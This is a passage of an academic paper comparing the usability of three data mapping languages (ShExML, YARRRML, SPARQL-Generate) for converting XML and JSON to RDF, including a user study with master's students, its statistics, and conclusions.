FIELD year <date > FIELD country <countryOfOrigin > FIELD director <director > FIELD screenwriters <screenwriter > } EXPRESSION films <films_xml_file.film_xml UNION films_json_file.film_json > :Films :[films.id] { :name [films.name] ; :year :[films.year] ; :country [films.country] ; :director [films.director] ; :screenwriter [films.screenwriters] ; } ShExML, our proposed language, can be used to map XML and JSON documents to RDF. The ShExML mapping for the films example is presented in Listing 6. It consists of source definitions followed by iterator definitions. The latter define structured objects which fields are populated with the results of source queries. The output of the mapping is described using a Shape Expression (ShEx) (Prud’hommeaux, Labra Gayo & Solbrig, 2014; Boneva, Labra Gayo & Prud’hommeaux, 2017) which can refer to the previously defined fields. The originality of ShExML, compared to the other two languages studied here, is that the output is defined only once even when several sources are used. This is a design choice that allows the user to separate concerns: how to structure the output on the one hand, and how to extract the data on the other hand. Comparing languages features In this subsection we compare languages features and what operations are supported or not in each language (see Table 1). Iterators, sources, fields, unions and so on are common to the three languages as they have the same objective. They have different syntaxes, as it can be seen in the three examples, but from a functionality point of view there are no differences. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 10/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 Table 1 Features comparison between the three languages. Features ShExML YARRRML SPARQL-Generate Source and output definition Defining output Shape expression Subject and predicate-object definitions Generate clause IRIs generation Prefix and value generation expression (concatenation) Prefix and value generation expression (array) Variable (previous use of con- cat function) or string inter- polation Datatypes & Lan- guage tags Yes Yes Yes Multiple results from a query Treated like an array Treated like an array Need to iterate over the re- sults Transformations Limited (Matchers and String operators). FnO hub Functions for strings and ex- tension mechanism Output formats Output RDF RDF RDF and any text-based for- mat Translation RML RML No translation offered Link between map- pings Shape Linking and JOIN keyword (do not fully cover YARRRML feature) Yes (conditions allowed) Nested generate clauses, filter clauses and extension mecha- nism Conditional map- ping generation No Yes (Function and conditional clause) Yes (Filter clause and exten- sion mechanism) Source and output definition and their artefacts: As we saw, the mechanism to define the form of the RDF output has different flavour in the three languages: subject and predicate-object definitions for every source in YARRRML; GENERATE clauses for every source in SPARQL-Generate; a single Shape Expression in ShExML. Additionally, the three languages offer slightly different operators for constructing the output values. All of them typically obtain IRIs by concatenating a source value to some prefix, and reuse literal values as is. YARRRML supports the generation of multiple named graphs whereas SPARQL-Generate can only generate one named graph at a time and ShExML only generates RDF datasets. Multiple results: The handling of multiple results, like it occurs on the screenwriters case, is different between SPARQL-Generate and the two other languages. In YARRRML and ShExML if a query returns multiple results they are treated like a list of them. However, in SPARQL-Generate this functionality must be explicitly declared like it can be seen in Listing 5. It leads to complex iterator definitions like the one used in JSON screenwriters one. Transformations: The possibility of transforming the output to another value by means of a function is something very useful for different purposes when building a knowledge graph. Therefore, in YARRRML this is supported through the FnO mechanism (Meester et al., 2017) which offers a way to define functions inside mapping languages in a declarative fashion. SPARQL-Generate offers some functions for strings embedded inside the SPARQL binding functions mechanism; however, it is possible to extend the language through the SPARQL 1.1 extension mechanism. In the case of ShExML, only Matchers and String operations are offered for transformation purposes. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 11/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 Other formats output: Output format on YARRRML and ShExML is limited to RDF; whereas, in SPARQL-Generate it is possible to also generate plain text, enabling the potential transformation to a lot of different formats. In this aspect, SPARQL-Generate presents a much more flexible output. Converserly, YARRRML and ShExML engines offer a translation of their mappings to RML rules which improves interoperability with other solutions. Link to other mappings: In YARRRML there is the possibility to link mappings between them. This functionality is provided by giving the name of the mapping to be linked and the condition that must be satisfied (e.g., ID of mapping A equal to ID of mapping B). This can be useful when the subject is generated with a certain attribute but this attribute does not appear on the other file so the linking should be done using another attribute. In ShExML this can be partially achieved by Shape linking—which is a syntactic sugar to avoid repeating an expression twice—and by the Join clause which gives an implementation for primary interlinking covering a subset of what is covered with YARRRML mapping linking. In SPARQL-Generate this can be achieved using nested Generate clauses and Filter clauses. Conditional mapping generation: Sometimes there is the need to generate triples only in the case that some condition is fulfilled. In YARRRML this is achieved using the conditional clause and a function. In SPARQL-Generate this can be obtained with the SPARQL 1.1 Filter clauses and also with the extensibility mechanism offered by the language. In ShExML this is not possible currently. Further features of SPARQL-Generate: Apart from what has been presented in the previous point, SPARQL-Generate, as being based on SPARQL 1.1, offers more expressiveness than the other two languages. One possibility that emerges from that is the use of defined variables. For example, it is possible to define an iterator of numbers and then use that numbers to request different parts of an API. This versatility enables the creation of very complex and rich scripts that can cover a lot of use cases. It is natural to expect that learning to use the full capabilities of SPARQL-Generate is complex, as the language offers a lot of features. In our experiments, however, only some basic features of the language were required and, as is shown in ‘Results’, it appears that SPARQL-Generate design did not help test subjects to solve the proposed tasks easily. METHODOLOGY In order to test our hypothesis that ShExML is easier for first-time users only experienced in programming and the basics of linked data, an experiment was carried out. The University of Oviedo granted ethical approval to carry out the described study. Verbal consent was requested before starting the experiment. Experiment design The selected tools were YARRRML (http://rml.io/yarrrml/), SPARQL-Generate (https://ci. mines-stetienne.fr/sparql-generate/) and ShExML (http://shexml.herminiogarcia.com/). We decided not to include RML (http://rml.io/) and similar alternatives for the same reason mentioned on ‘Presentation of the Languages Under Study’. Three manuals were designed for the students based on the example about films that described how the integration can be García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 12/27 https://peerj.com http://rml.io/yarrrml/ https://ci.mines-stetienne.fr/sparql-generate/ https://ci.mines-stetienne.fr/sparql-generate/ http://shexml.herminiogarcia.com/ http://rml.io/ http://dx.doi.org/10.7717/peerj-cs.318 2Material can be consulted on: https: //github.com/herminiogg/shexml-paper- 2019-data/tree/master/experiment- material. done with each tool.2 The experiment was designed to be performed in each tool dedicated online environment, which are available through the Internet as a webpage. In addition, a small manual was developed to guide the students along the experiment and to inform them about the input files and which are the expected outputs2. This manual contained two tasks to perform during the experiment which were designed to be performed sequentially, i.e., the student should finish the first task before starting with the second one. The first task was the mapping and integration of two files (JSON and XML) with information about books which should be mapped in a unique RDF graph. The final output should be equal to the one given in the guide. The second task was to modify the script done in the previous task so that the prices are separated and can be compared between markets. In other words, that multiple prices are tagged individually referring to the market where the specific price was found, like they were in the input files. This second task gives us an intuition on how easy is to modify an existing set of data mapping rules in each language. The study was designed as a mixed method approach, including a quantitative analysis and a qualitative analysis. For the quantitative analysis measures, Mousotron (http://www.blacksunsoftware.com/mousotron.html) was used which allows to register the number of keystrokes, the distance travelled by the mouse and so on. For the qualitative analysis two Office 365 forms were used with questions based on a Likert scale (see questions in Table 2). In addition, the elapsed time was calculated from timestamps in the Office 365 forms. Conduction The sample consisted on 20 students (four women and 13 men) of the MSc in Web Engineering first-year course (out of two years) at the University of Oviedo (http://miw.uniovi.es/). Most of them have a bachelor degree (240 ECTS credits) in computer science or similar fields. They were receiving a semantic web course of two weeks—a total of 30 hours (3 hours per day)—where they were introduced to semantic technologies like: RDF, SPARQL, ShEx, etc. Before this course they had not previous knowledge on semantic web technologies. Regarding prior knowledge of YAML by subjects, even though it is normally known and used by developers, we could not assure it. The experiment was hosted the final day of the course. The experiment was conducted in their usual classroom and with their whole-year- assigned computers. So that they were in a confortable environment and with a computer they are familiar with. The three tools were assigned to the students in a random manner. Each student received the printed manual for its assigned tool and they were given a time of 20 minutes to read it, test the language in the online environment, and ask doubts and questions. Once these 20 minutes were elapsed the printed experiment guide was given to the students and they were explained about the experiment proceeding with indications about Mousotron operation. In particular the procedure followed to perform the whole experiment was: 1. Open the assigned tool on the dedicated webpage and clear the given example. 2. Open Mousotron and reset it. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 13/27 https://github.com/herminiogg/shexml-paper-2019-data/tree/master/experiment-material https://github.com/herminiogg/shexml-paper-2019-data/tree/master/experiment-material https://github.com/herminiogg/shexml-paper-2019-data/tree/master/experiment-material https://github.com/herminiogg/shexml-paper-2019-data/tree/master/experiment-material https://peerj.com http://www.blacksunsoftware.com/mousotron.html http://miw.uniovi.es/ http://dx.doi.org/10.7717/peerj-cs.318 Table 2 Statements to evaluate by the students based on a 5 point Likert scale. Questionnaire Statement Obtained Variable 1 The experience with the tool was satisfactory General satisfaction level 1 The tool was easy to use Easiness of use 1 The mapping definitions was easy Mapping definition easiness 1 The language was easy to learn Learnability 1 I find that these tool can be useful in my work Applicability 1 The coding in this tool was intuitive Intuitiveness 1 The language design leads to commit some errors Error proneness 1 The error messages were useful to solve the problems Error reporting usefulness 2 It was easy to define different predicates for the price Modifiability 3. Proceed with task 1 (start time registered for elapsed time calculation). 4. Once task 1 is finished, capture Mousotron results (screenshot) and fill the first Office 365 questionnaire. 5. Reset Mousotron and proceed with task 2. 6. Once task 2 is finished, capture Mousotron results (screenshot) and fill the second Office 365 questionnaire. Analysis The quantitative results were dump into an Excel sheet and anonymised. Although many results can be used as given by the students, some of them need to be calculated. This is the case of elapsed time (on both tasks), completeness percentage and precision. Elapsed time in the first task (tt1) was calculated as the subtraction of questionnaire 1 beginning time (stq1) and experiment start time (ste), i.e., (tt1 = stq1−ste). Elapsed time in the second task (tt2) was calculated as the subtraction of questionnaire 1 ending time (etq1) and questionnaire 2 beginning time (stq2), i.e., (tt2= stq2−etq1). Completeness percentage was calculated from three measures: the proportion of correctly generated triples contributed 50%, the proportion of data correctly translated contributed 25% and the proportion of correctly generated prefixes and datatypes as a 25%. This design gives more importance to the structure, which is the main goal when using these tools. Other aspects, like correct data (i.e., the object part of a triple), prefixes (i.e., using the correct predicate for the subject, the predicate and the object in case of an IRI) and the datatype (i.e., putting the correct xsd type in case of a literal object) are a little less valued as these errors could come more easily from a distraction or an oversight. Let CP be the completeness percentage, t the number of triples, d the number of data gaps and p&dt the number of prefixes and datatypes, so the calculation of the completeness percentage can be expressed as: CP =0.5∗ ttotal−tgenerated ttotal +0.25∗ dtotal−dgenerated dtotal +0.25∗ p&dttotal−p&dtgenerated p&dttotal . Finally, precision was calculated as the division of current student elapsed time by minimum elapsed time of all students, multiplied by the completeness percentage. This precision formulation gives us an intuition on how fast was some student in comparison García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 14/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 with the fastest student and with a correction depending on how well his/her solution was. Let tsn be the elapsed time of student n and CPsn the completeness percentage of student n calculated with the previous formula. Precisionsn= tsn min({ts1,...,tsn}) ∗CPsn. The results of the qualitative analysis were only anonymised as they can be directly used from the Office 365 output. For the analysis the IBM SPSS version 24 was used. We planned a One Way ANOVA test within the three groups in the quantitative analysis where a normal distribution was found and the Kruskal-Wallis test where not. The qualitative analysis comparison between three groups was established using the Kruskal-Wallis test. The report and analysis of the results was made using Field (2013) as guidance and using the suggested APA style as a standard manner to report statistical results. Threat to validity In this experiment we have identified the following threats to its validity. Internal validity We have identified the following internal validity threats in the experiment design: • More expertise in some specific tool: In semantic web area—as in other areas—people tend to be more expert in some specific technologies and languages. The derived risk is that this expertise can have an influence on final results. To alleviate this we have selected MSc students that are studying the same introductory semantic web course and we have assigned the tools in a random manner. • Not homogeneous group: It is possible that the selected group is not homogeneous on skills and previous knowledge. To mitigate this we have applied the same measures as for the previous threat: Students of a semantic web course and a randomised tool assignment. • Unfamiliar environment: In usability studies, unfamiliar environments can play a role on final conclusions. Therefore, we opted to run the experiment in a well-known environment for the students, that is, their whole-year classroom. • More guide and information about one tool: As we have designed one of the languages, it could lead to a bias in information delivery. To try to mitigate this threat we developed three identical manuals for each tool. Questions and doubts were answered equally for all the students and tools. External validity Following the measures taken in the internal validity threats we identified the corresponding external validity ones: • Very focused sample: As we have restricted the profile of the sample to students of a MSc course which are more or less within the same knowledge level, there is the risk that these findings cannot be extrapolated for other samples or populations. It is possible that for semantic web practitioners—with different interests and expertises—these findings García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 15/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 3Original datasets available on: https: //github.com/herminiogg/shexml-paper- 2019-data/tree/master/datasets. are not applicable. However, the intention of this study was to evaluate usability with first-time users as a first step to guide future studies. RESULTS From the 20 students of the sample,3 in the first task, three of them left the experiment without making any questionnaire, two for SPARQL-Generate and one for YARRRML. In the second task, only seven out of the 20 students made the questionnaire, six for ShExML and 1 for YARRRML. The statistical analysis was made using the IBM SPSS software, version 24. Task 1: As previously stated, the number of students that finished—correctly or not—the proposed task was 17. Descriptive statistics can be seen in Table 3. Comparison of three groups was made by means of a One Way ANOVA which results showed significant differences on elapsed seconds F(2,14)=6.00, p= .013, ω= .60. As completeness percentage and precision are not following a normal distribution on SPARQL-Generate group (W (4)= .63, p= .001 and W (4)= .63, p= .001), the comparison was established by means of the Kruskal-Wallis test which showed significant differences in both variables (H(2)=9.73, p= .008 and H(2)=9.68, p= .008). Post hoc test for elapsed seconds using the Gabriel’s criterion showed significant differences between ShExML group and YARRRML group (p= .016). Post hoc test for completeness percentage and precision using the Bonferroni’s criterion showed significant differences between ShExML and SPARQL- Generate (p= .012, r = .87 and p= .012, r = .87). Likert scale questionnaire results (α=0,73) (see Fig. 1) were analysed using Kruskal-Wallis test which resulted in significant differences between groups for variables general satisfaction level (H(2)=6.28, p= .043), easiness of use (H(2)=9.82, p= .007), mapping definition easiness (H(2)=10.25, p= .006) and learnability (H(2)=8.63, p= .013). Bonferroni’s criterion was used as post hoc test for the variables with significant differences. For general satisfaction level significant differences were found between ShExML and YARRRML (p= .039, r = .69). For easiness of use significant differences were found between ShExML and YARRRML (p= .011, r = .81). For mapping definition easiness significant differences were found between ShExML and SPARQL-Generate (p= .013, r = .90) and between ShExML and YARRRML (p= .037, r = .69). For learnability significant differences were found between ShExML and SPARQL-Generate (p= .042, r = .78) and between ShExML and YARRRML (p= .040, r = .69). Task 2: In this task only seven students reached this step: 6 for ShExML and 1 for YARRRML. Descriptive statistics of this task can be seen in Table 4. No significant differences were found in any of the variables. In subjective variable analysis (see Fig. 2) no significant differences were found. DISCUSSION Statistical results discussion Results of task 1 show that variables like keystrokes, left button clicks, right button clicks, mouse wheel scroll and meters travelled by the mouse, do not have a significant García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 16/27 https://github.com/herminiogg/shexml-paper-2019-data/tree/master/datasets https://github.com/herminiogg/shexml-paper-2019-data/tree/master/datasets https://github.com/herminiogg/shexml-paper-2019-data/tree/master/datasets https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 Table 3 Descriptive statistics for task 1 objective results where n is the sample size, x̄ is the mean, s is the standard deviation, max is the maxi- mum value of the sample and min is the minimum value of the sample. (*) means significant differences between groups and (a) means significant differences in the post hoc test between the marked groups at the level of significance (α = .05). Differences in totals are due to malfunctions while operating capture software. Measure Group n x̄ s max min Elapsed seconds (*) ShExML (a) 7 1,560.1429 541.57376 2,192 782 YARRRML (a) 6 2,443.8333 375.44502 2,896 1,891 SPARQL-Generate 4 2,292.7500 533.49063 2,769 1,634 Total 17 2,044.4118 620.68370 2,896 782 Keystrokes ShExML 6 1,138.50 610.588 2,287 674 YARRRML 4 1,187 449.649 1,795 810 SPARQL-Generate 3 1,125.67 121.476 1,265 1,042 Total 13 1,150.46 457.183 2,287 674 Left button clicks ShExML 6 176.50 112.169 327 58 YARRRML 4 318.75 177.989 551 170 SPARQL-Generate 3 166 78.791 254 102 Total 13 217.85 138.267 551 58 Right button clicks ShExML 6 2.17 2.137 6 0 YARRRML 4 2.25 1.708 4 0 SPARQL-Generate 2 4.50 2.121 6 3 Total 12 2.58 2.021 6 0 Mouse wheel scroll ShExML 6 148 183.737 486 13 YARRRML 4 679.25 606.711 1,404 101 SPARQL-Generate 3 199 131.160 348 101 Total 13 323.23 412.819 1,404 13 Meters travelled by the mouse ShExML 7 30.400 24.318 70.079 0 YARRRML 6 43.454 43.144 101.767 0 SPARQL-Generate 4 21.220 16.526 37.680 0 Total 17 32.847 30.550 101.767 0 Completeness percentage (*) ShExML (a) 7 0.771 0.296 1 0.19 YARRRML 6 0.323 0.366 0.82 0 SPARQL-Generate (a) 4 0.02 0.04 0.08 0 Total 17 0.436 0.415 1 0 Precision (*) ShExML (a) 7 0.495 0.286 1 0.07 YARRRML 6 0.131 0.160 0.38 0 SPARQL-Generate (a) 4 0.005 0.01 0.02 0 Total 17 0.251 0.292 1 0 variability depending on the used tool. This suggests that web interfaces used as online development environments are more or less homogeneous and do not have an impact on the development of the scripts. However, keystrokes variable results should be considered with caution because for SPARQL-Generate the mean of completeness percentages was very low; therefore, achieving a final solution may involve more keystrokes. On the other hand, elapsed seconds, completeness percentage and precision show significant differences between groups which suggest that the selected language has an influence on these variables. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 17/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 (a) (a) (*) (*) (*) (*) (a) (a) (a) (a) (a) (a) (b) (b) (b) (b) - - - - - - - - Figure 1 Task 1 results for Likert scale questionnaire where results are divided into questions and groups. (*) means significant differences between groups and (a) and (b) means significant differences in the post hoc test between the marked groups at the level of significance α= .05. Full-size DOI: 10.7717/peerjcs.318/fig-1 Moreover, we can see that elapsed seconds has a medium size effect (ω= .60). Post hoc results show that there are significant differences between ShExML and YARRRML which suggests that YARRRML users tend to need more time than ShExML users for these tests. In the case of comparisons with SPARQL-Generate there are not significant differences which can be due to the small sample size and the low completeness percentage. Differences between ShExML and SPARQL-Generate for completeness percentage and precision suggest that SPARQL-Generate users were not able to achieve working solutions as ShExML users, which have the highest mean on both variables. However, between ShExML and YARRRML groups there were no significant differences which is in line with the great variability of those two variables. Results of task 2 do not show any significant difference between the ShExML group and the YARRRML group. This can be explained by the low sample size in the YARRRML group where only one individual made this step. However, completeness percentage and precision show us that some students did achieve a correct solution with ShExML, whereas in YARRRML group and in SPARQL-Generate group they did not. This leads to the conclusion that only the ShExML group managed to find a working solution to both García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 18/27 https://peerj.com https://doi.org/10.7717/peerjcs.318/fig-1 http://dx.doi.org/10.7717/peerj-cs.318 Table 4 Descriptive statistics for task 2 objective results where n is the sample size, x̄ is the mean, s is the standard deviation, max is the maximum value of the sample and min is the minimum value of the sample. Differences in totals are due to malfunctions while operating capture software. Measure Group n x̄ s max min Elapsed seconds ShExML 6 325.5 328.9248 879 3 YARRRML 1 47 0 47 47 Total 7 285.7143 318.1822 879 3 Keystrokes ShExML 5 206.40 175.832 438 43 YARRRML 1 91 0 91 91 Total 6 187.17 164.174 438 43 Left button clicks ShExML 5 61.80 81.417 207 16 YARRRML 1 43 0 43 43 Total 6 58.67 73.225 207 16 Right button clicks ShExML 5 0.40 0.548 1 0 YARRRML 1 0 0 0 0 Total 6 0.33 0.516 1 0 Mouse wheel scroll ShExML 5 123.80 129.494 288 0 YARRRML 1 41 0 41 41 Total 6 110 120.655 288 0 Meters travelled by the mouse ShExML 6 9.7629 13.8829 37.7565 0 YARRRML 1 11.7563 0 11.7563 11.7563 Total 7 10.0477 12.6957 37.7565 0 Completeness percentage ShExML 6 0.73 0.3904 1 0 YARRRML 1 0 0 0 0 Total 7 0.6257 0.4507 1 0 Precision ShExML 6 0.4683 0.37467 1 0 YARRRML 1 0 0 0 0 Total 7 0.4014 0.38512 1 0 proposed tasks. Nevertheless, these conclusions must be validated with bigger experiments to have statistical confidence. The differences in completeness percentage and precision between ShExML and SPARQL-Generate and also between ShExML and YARRRML in elapsed seconds can lead us to the conclusion that usability on first-time users is improved by using ShExML over the other two languages, which answers RQ1. Moreover, this conclusion is reinforced by the situation that in task 2 neither YARRRML nor SPARQL-Generate users were able to find a solution to this task. Regarding the subjective analysis, significant differences were found between groups in general satisfaction level, mapping definition easiness easiness of use and learnability (as perceived by the students). On general satisfaction level significant differences were found between ShExML and YARRRML which indicates that ShExML users were more satisfied with the overall use of the tool respect to the YARRRML users. Differences between SPARQL-Generate users and the two other groups could not be established due to their low completeness percentage and precision rates. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 19/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 Figure 2 Task 2 results for Likert scale questionnaire where results are divided into the two groups. Full-size DOI: 10.7717/peerjcs.318/fig-2 In the case of easiness of use significant differences were found between ShExML and YARRRML which suggests that ShExML users found this language easier to use than YARRRML users did with their language counterpart. In this case, like in the previous variable, significant differences could not be established between SPARQL-Generate and the two other groups due to low completeness percentage. In mapping definition easiness differences were established between ShExML group and YARRRML group and between ShExML group and SPARQL-Generate group which indicates that ShExML users found mappings easier to define in ShExML than in the other two languages. We also note that users did not find differences on mapping definition easiness between YARRRML and SPARQL-Generate, this may be because SPARQL- Generate users did not use the whole language. On learnability significant differences were found between ShExML and SPARQL- Generate and between ShExML and YARRRML which suggests that the users found easier to learn ShExML than the other two languages. However, no significant differences were found between YARRRML and SPARQL-Generate which seems strange due to the difference of verbosity between the two languages. Differences on subjective analysis between ShExML and YARRRML on general satisfaction level, mapping definition easiness, easiness of use and learnability, and between ShExML and SPARQL-Generate on mapping definition easiness and learnability comes to corroborate what we have elucidated with the objective analysis answering RQ1. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 20/27 https://peerj.com https://doi.org/10.7717/peerjcs.318/fig-2 http://dx.doi.org/10.7717/peerj-cs.318 Review of the other variables shows that the users do not see much applicability on the three languages, that the design of the languages leads users to commit some errors during the development of the script and that the error reporting system in the three of them is not very useful to solve the incoming problems. The feedback received from the users in the error proneness and error reporting usefulness variables determines that these two aspects are the ones that should be improved in the three languages to improve their usability. This comes to answer the RQ3. For the modifiability variable assessed in task 2, ShExML users tend to rate this feature with high marks whereas the single YARRRML user gave a response of 3 in a 5 point Likert scale which is in line with his/her completeness percentage mark. As with the objective results of task 2, these subjective results should be further validated in future bigger experiments to corroborate these early findings. Alignment with features comparison In the light of the statistical analysis outcome, SPARQL-Generate design has been shown to have a negative impact on first-time users. This led to three users abandoning the task and low completeness scores for the rest of the group. Although having more features in a language is something good and desirable, these results caught attention on how these features should be carefully designed and included in the language in order to improve easiness of use, and thus overall adoption of the tool. In the case of YARRRML language, although it has been designed with human-friendliness in mind, in our experiment it has not reached the expected results in comparison with ShExML. However, it has better results than SPARQL-Generate, suggesting it is less complex to use than that language, but still more complex than ShExML. Nevertheless, it does not seem that supported features could explain the differences between YARRRML and ShExML as the features used on the experiment are more or less equal. Instead other syntax details may be affecting the differences between these two groups such as: the use of keywords that made the language more self explanatory and the modularity used on iterators which reminds of object-oriented programming languages. However, this would require a broader study taking into account programming style background of participants and their own style preferences using techniques like a cognitive complexity architecture (Hansen, Lumsdaine & Goldstone, 2012) to identify how each feature and its design is affecting the usability of each specific language. These results highlight the importance on how features are designed and included in a language. Therefore, SPARQL-Generate with more features and being a highly flexible language tends to have a bad influence on users’ usability. Comparing ShExML and YARRRML we see that these differences are smaller than with SPARQL-Generate and that features support does not seem to be the variable affecting YARRRML usability. Thus, we can conclude—and answer the RQ2—that it is not the features supported by a language which affects usability of first-time users but their design. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 21/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 CONCLUSIONS AND FUTURE WORK Inthisworkwehavecomparedtheusabilityofthreeheterogeneousdatamappinglanguages. The findings of our user study were that better results, and speed on finding this solution, are related to ShExML users whereas SPARQL-Generate users were not able to find any solution under study conditions. In the case of YARRRML users, they performed better than SPARQL-Generate users but worse than ShExML users finding partial solutions to the given problem. This study is (to our knowledge) the first to explore the topic of usability for first-time users with programming and Linked Data background in these kind of languages. It also reflects the importance that usability has on the accuracy of the encountered solutions and how features should be carefully designed in a language to not impact negatively on its usability. As future work, bigger experiments should be carried out with an emphasis on programming style background and styles (using cognitive complexity frameworks) to corroborate and expand these early findings. In addition, improving these aspects that were worst rated in the three languages (i.e., error proneness and the error reporting system) would enhance perceived user friendliness. This work highlights the importance of usability on these kind of languages and how it could affect their adoption. ACKNOWLEDGEMENTS We want to thank the students of the Master’s Degree in Web Engineering for their willingness to participate in the experiment described in this work. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work has been funded by the Principality of Asturias through the Severo Ochoa call (grant BP17-29), by the Ministry of Economy, Industry and Competitiveness under the call of ‘‘Programa Estatal de I+D+i Orientada a los Retos de la Sociedad’’ (project TIN2017-88877-R), the CPER Nord-Pas de Calais/FEDER DATA Advanced data science and technologies 2015–2020, and the ANR project DataCert ANR-15-CE39-0009. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Principality of Asturias through the Severo Ochoa call: BP17-29. Ministry of Economy, Industry and Competitiveness under the call of ‘‘Programa Estatal de I+D+i Orientada a los Retos de la Sociedad’’: TIN2017-88877-R. The CPER Nord-Pas de Calais/FEDER DATA Advanced data science and technologies 2015-2020. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 22/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.318 The ANR project DataCert: ANR-15-CE39-0009. Competing Interests The authors declare there are no competing interests. Author Contributions • Herminio García-González conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Iovka Boneva conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Sławek Staworko and Juan Manuel Cueva Lovelle performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • José Emilio Labra-Gayo conceived and designed the experiments, performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The University of Oviedo granted ethical approval to carry out the described study. Data Availability The following information was supplied regarding data availability: Experiment data, supplemental material and raw data are available at GitHub: https://github.com/herminiogg/shexml-paper-2019-data. REFERENCES Auer S, Dietzold S, Lehmann J, Hellmann S, Aumueller D. 2009. Triplify: light- weight linked data publication from relational databases. In: Proceedings of the 18th international conference on World Wide Web, WWW 2009, Madrid, Spain, April 20– 24, 2009. 621–630 DOI 10.1145/1526709.1526793. Battle S. 2004. Round-tripping between XML and RDF. In: International semantic web conference (ISWC), Hiroshima, Japan. Battle S. 2006. Gloze: XML to RDF and back again. In: Proceedings of the first Jena user conference. Berners-Lee T, Hendler J, Lassila O. 2001. The semantic web. Scientific American 284(5):28–37. Bischof S, Decker S, Krennwallner T, Lopes N, Polleres A. 2012. Mapping be- tween RDF and XML with XSPARQL. Journal on Data Semantics 1(3):147–185 DOI 10.1007/s13740-012-0008-7. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 23/27 https://peerj.com https://github.com/herminiogg/shexml-paper-2019-data http://dx.doi.org/10.1145/1526709.1526793 http://dx.doi.org/10.1007/s13740-012-0008-7 http://dx.doi.org/10.7717/peerj-cs.318 Bizer C, Seaborne A. 2004. D2RQ-treating non-RDF databases as virtual RDF graphs. In: Proceedings of the 3rd international semantic web conference (ISWC2004), vol. 2004. Proceedings of ISWC2004. Boneva I, Labra Gayo JE, Prud’hommeaux EG. 2017. Semantics and validation of shapes schemas for RDF. In: d’Amato C, Fernandez M, Tamma V, Lecue F, Cudré-Mauroux P, Sequeda J, Lange C, Heflin J, eds. The semantic web—ISWC 2017. Cham: Springer International Publishing, 104–120. Breitling F. 2009. A standard transformation from XML to RDF via XSLT. Astronomische Nachrichten 330(7):755–760 DOI 10.1002/asna.200811233. Das S, Sundara S, Cyganiak R. 2012. R2RML: RDB to RDF mapping language. Available at https://www.w3.org/TR/r2rml/ . Deursen DV, Poppe C, Martens G, Mannens E, de Walle RV. 2008. XML to RDF conversion: a generic approach. In: Automated solutions for cross media content and multi-channel distribution, 2008. AXMEDIS ’08. International conference on. Washington, 138–144 DOI 10.1109/AXMEDIS.2008.17. Dimou A, Sande MV, Colpaert P, Verborgh R, Mannens E, de Walle RV. 2014. RML: a generic language for integrated rdf mappings of heterogeneous data. In: Proceedings of the workshop on linked data on the web co-located with the 23rd international world wide web conference (WWW 2014), Seoul, Korea, April 8, 2014. Ermilov I, Auer S, Stadler C. 2013. CSV2RDF: User-driven CSV to RDF mass conversion framework. In: Proceedings of the ISEM, vol. 13. Graz, Austria, 04–06. Fagin R, Kolaitis PG, Miller RJ, Popa L. 2005. Data exchange: semantics and query an- swering. Theoretical Computer Science 336(1):89–124 DOI 10.1016/j.tcs.2004.10.033. Field A. 2013. Discovering statistics using IBM SPSS statistics. Thousand Oaks: Sage. Fiorelli M, Lorenzetti T, Pazienza MT, Stellato A, Turbati A. 2015. Sheet2RDF: a flexible and dynamic spreadsheet import&lifting framework for RDF. In: Current approaches in applied artificial intelligence—28th international conference on industrial, engineer- ing and other applications of applied intelligent systems, IEA/AIE 2015, Seoul, South Korea, June 10–12, 2015, proceedings. 131–140 DOI 10.1007/978-3-319-19066-2_13. Freire F, Freire C, Souza D. 2017. Enhancing JSON to RDF data conversion with entity type recognition. In: Proceedings of the 13th international conference on web information systems and technologies, WEBIST 2017, Porto, Portugal, April 25–27, 2017. 97–106 DOI 10.5220/0006302900970106. García-González H, Fernández-Álvarez D, Gayo JEL. 2018. ShExML: an heterogeneous data mapping language based on ShEx. In: Proceedings of the EKAW 2018 posters and demonstrations session co-located with 21st international conference on knowledge engineering and knowledge management (EKAW 2018), Nancy, France, November 12– 16, 2018. 9–12. Halevy AY. 2001. Answering queries using views: a survey. The VLDB Journal 10(4):270–294 DOI 10.1007/s007780100054. Han L, Finin T, Parr CS, Sachs J, Joshi A. 2008. RDF123: from spreadsheets to RDF. In: The semantic web—ISWC 2008, 7th international semantic web conference, García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 24/27 https://peerj.com 